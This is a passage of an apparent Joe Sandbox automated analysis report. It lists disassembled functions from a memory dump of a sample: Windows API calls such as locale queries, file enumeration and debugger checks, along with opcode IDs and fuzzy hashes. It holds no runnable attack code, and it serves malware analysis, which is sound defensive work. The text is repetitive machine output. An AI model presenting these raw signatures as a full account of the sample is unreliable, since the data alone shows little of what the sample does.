                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,001A4D1D,00000002,00000000,?,?,?,001A4D1D,?,00000000), ref: 001A5429
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,001A4D1D,?,00000000), ref: 001A543E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: 70c9b1a76955426152270fa245caaff9d01b851c89d3a3174595a1eee76d7fc2
                                                                                                                                                                                                                                        • Instruction ID: 71583f71daf1ccb2011c9e3ae1368bed12f53c277a0096e33739a8fcd9788963
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70c9b1a76955426152270fa245caaff9d01b851c89d3a3174595a1eee76d7fc2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2321B37A70C900ABDF348F14C940A9772E7FF9ABA1B568024E90ADB111F772DE81D390
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 001A4CEF
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 001A4D2D
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 001A4D40
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001A4D88
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001A4DA3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                                                                                        • Opcode ID: 62eacf1e787e78d4714f386cbe7b27505c433f280ef7b6de30c1f4ddfcb270b5
                                                                                                                                                                                                                                        • Instruction ID: e2eee392404f5beef396b1f52b87f746a972c1fc103e8064ebaf72d3b68bc25b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62eacf1e787e78d4714f386cbe7b27505c433f280ef7b6de30c1f4ddfcb270b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C751B179A01209AFEF11DFA4CC41ABE73B8FF9A310F044529F915E7191E7B09A40CBA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ci)$ci)$ci)$ci)$ci)
                                                                                                                                                                                                                                        • API String ID: 0-4041680830
                                                                                                                                                                                                                                        • Opcode ID: 570158c59b0905fd0bd88724970e04c7891ca3bea4c7ec97e3e99c6b7f4f177c
                                                                                                                                                                                                                                        • Instruction ID: ef0d00210282a0e6b3315949c14ab3083b7ab65384929d51e50d1f6b957ee1e0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 570158c59b0905fd0bd88724970e04c7891ca3bea4c7ec97e3e99c6b7f4f177c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FA1A236B093114FD714DE28C8C56AA77D2AFD6314F1E8D19E889CB3A1D734CD468B82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: n)cg$o)cg$o)cg$o)cg$o)cg
                                                                                                                                                                                                                                        • API String ID: 0-2003806078
                                                                                                                                                                                                                                        • Opcode ID: be55e6a54fe8bbe1d33d524c3b5bd14c84f436a5cd38cda1b8a5234f5e029505
                                                                                                                                                                                                                                        • Instruction ID: 4dfe405ba02167b0ae8fddbde99bdcb19fc87e759637bbeab4ea5860030a88f6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be55e6a54fe8bbe1d33d524c3b5bd14c84f436a5cd38cda1b8a5234f5e029505
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3817B263003058BDB28897998E53AF77E28FD5341F69D43DD84ACB761DB26CC895B82
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00172B7C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2882836952-0
                                                                                                                                                                                                                                        • Opcode ID: 3508a05bf91422b30803be6562c1664ba0290a64b2d1de43ac178000c9de5608
                                                                                                                                                                                                                                        • Instruction ID: 3cec148d5f627b5a69b1e6904a3bf2070c37247d86b51e97809dce4340cdc69d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3508a05bf91422b30803be6562c1664ba0290a64b2d1de43ac178000c9de5608
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E1572A3453014FDF2C893898F57EA37D69BD5311F28D52DE48ACB295D73A8C8ADB01
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8a6d6bbfbdfac0af729e117258117d4ec5519420a9930abf5db6db09bc4664dc
                                                                                                                                                                                                                                        • Instruction ID: 0fc2af832d363256ec93b8b1b3641e3454d7f7e0f584e9734a15fd160df92552
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a6d6bbfbdfac0af729e117258117d4ec5519420a9930abf5db6db09bc4664dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05023A71E012199BDF14CFA9C9906AEFBF1FF48314F258269E959E7380D731AA41CB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001A5A39
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                        • Opcode ID: dd16d661d8c6f3c16ad170088bb5c493882af28e514810352369a37e59266f44
                                                                                                                                                                                                                                        • Instruction ID: 97bc81c145e79d66907d81054ba136e8f481ec99f0f57a4bd0c53f5a89291dcd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd16d661d8c6f3c16ad170088bb5c493882af28e514810352369a37e59266f44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8571F67990951DAFDF21EF24CC89AAEB7BAEB16304F1441D9E00DE7211EB304E858F64
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00190F67
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00191033
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00191053
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0019105D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                        • Opcode ID: 98243cfc69839c9960a53ed22eb010eb41f7497eaeb85245ca1a26404aa449d5
                                                                                                                                                                                                                                        • Instruction ID: 3be41655bcde072f2c54ccbe2fce1e70845aa2ff5c1a51952c7ea8003ce64ac8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98243cfc69839c9960a53ed22eb010eb41f7497eaeb85245ca1a26404aa449d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4312775D0521D9BEF21DFA4D989BCDBBB8AF18304F1041AAE40CAB250EB719B85CF45
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 001826D4
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00182908
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Facet_LockitLockit::_Register
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 602326365-0
                                                                                                                                                                                                                                        • Opcode ID: 91050129db1ae73fc8cefc847d08cc2702a6f4c918226be4643e81f6a6d5deb0
                                                                                                                                                                                                                                        • Instruction ID: 19861b59e99db6ea35c39ea6518aacafd4ffa58aa40c31ad6d90b82de7b80d09
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91050129db1ae73fc8cefc847d08cc2702a6f4c918226be4643e81f6a6d5deb0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 458126716043058FCB14AA28D8D566E77D6AFB9324F24892EF889D7351C734CE868F92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A4F34
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A4F7E
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A5044
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                                                                                        • Opcode ID: 290cf532130a36bb86977db6dd4862d2f7bf45d188c042ffe17899a964a5c6c3
                                                                                                                                                                                                                                        • Instruction ID: d26de12096276bf996dcd7edb9ff20a3c27f53d9a7260e203e5f71ca50d392db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 290cf532130a36bb86977db6dd4862d2f7bf45d188c042ffe17899a964a5c6c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF61BF75654A079FEB289F28CD82BBAB7A9FF16300F1041B9E905C6581F734D981DB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0019A722
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0019A72C
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0019A2C0,?,?,?,?,?,?), ref: 0019A739
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                        • Opcode ID: cb58144dd03fd2a0ff30ea4fabd4cf4519097a9318a0e82e1fd49a1090ab2b3d
                                                                                                                                                                                                                                        • Instruction ID: e72304f1566a75f4e9ffe17779ee2734d1fa7c6f804a85f86f0be421b4130347
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb58144dd03fd2a0ff30ea4fabd4cf4519097a9318a0e82e1fd49a1090ab2b3d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8131C3759012289BCF21DF68DC89B9CBBB8BF18714F5042EAE41CA7250E7749F858F85
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: MQAc$NQAc$NQAc
                                                                                                                                                                                                                                        • API String ID: 0-726613130
                                                                                                                                                                                                                                        • Opcode ID: ea050642eaa057dbe7983441d300f54f2b4f4c7b2848d8a19e67b930b91e1ce3
                                                                                                                                                                                                                                        • Instruction ID: 153a766ee0cf7194205f0bd7c05614408ae9e43ead02b86c5ce846c5d42dbdae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea050642eaa057dbe7983441d300f54f2b4f4c7b2848d8a19e67b930b91e1ce3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6422F377B0C2148BCF24AA2884C426EB7D39BE5360F7B5956E858973D0D735CE858F82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: lA[ $lA[ $lA[
                                                                                                                                                                                                                                        • API String ID: 0-3046995957
                                                                                                                                                                                                                                        • Opcode ID: 570be103142f4a27f7c395c24914a8c208be8644f7e2e41c251a82e9eccd8d20
                                                                                                                                                                                                                                        • Instruction ID: 5e3e0f5b5b8728685871db0536ab7d5e31dfec616bb4f1c329856991530a3751
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 570be103142f4a27f7c395c24914a8c208be8644f7e2e41c251a82e9eccd8d20
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77A13B75A482018F5B288E18C89416E77F2DFFC354BAAD81AE58DCB354C734CC869B83
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
